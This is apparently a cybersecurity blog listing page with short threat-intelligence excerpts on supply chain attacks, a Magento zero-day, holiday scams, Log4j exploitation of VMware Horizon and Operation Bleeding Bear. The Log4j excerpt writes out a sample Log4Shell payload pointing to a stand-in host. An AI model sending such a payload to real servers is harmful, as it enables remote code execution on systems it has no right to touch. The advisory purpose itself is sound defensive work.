According to a study by Argon Security, software supply chain attacks grew by more than 300% in 2021 compared to 2020. The study also indicated that attackers focus most heavily on open-source vulnerabilities, code integrity issues, and the tools’ exploitation to disrupt any supply chain. What are supply chain attacks? A supply chain attack aims to infiltrate […]
Severity: Critical INTRODUCTION Adobe has addressed critical Magento Zero-Day Vulnerability (CVE-2022-24086) that is under active exploitation by threat actors. The security flaw impacts Adobe Commerce and Magento Open Source products. Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary code and may result in the complete compromise of a vulnerable system. The […]
Valentine’s Day is approaching fast. And on this day, if anyone is more active than lovers around the world, it is the cybercriminals. Cybercriminals always look for opportunities to take advantage of oblivious online consumers. From counterfeit gift scams to fake dating apps, their presence is everywhere. Research from security firm Check Point revealed that over […]
Severity: High Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability in VMware Horizon. Attack Chain:• In ongoing threat campaigns, the attackers attempt to initiate the attack via Log4Shell payload similar to ${jndi:ldap://example.com} targeting vulnerable VMware Horizon servers.• The attack exploits the Log4Shell vulnerability […]
The threat campaign is referred to as Operation Bleeding Bear. The attacks are currently limited to Ukrainian government agencies and businesses; however, the attack seems to have evolved and sophisticated over time, targeting almost all countries. The threat poses a risk to any government agency, non-profit or enterprise system. The malware campaign has been mapped […]
The end of 2021 brought with it two high-impact events. One was the appearance of the Omicron variant that has led to a resurgence in the number of cases worldwide. Another was the Log4J vulnerability that reminded us of a similar cybersecurity event that occurred at the end of 2020 – the SolarWinds hack. In […]
Shalaka Patil
Nandeesha B
K K Mookhey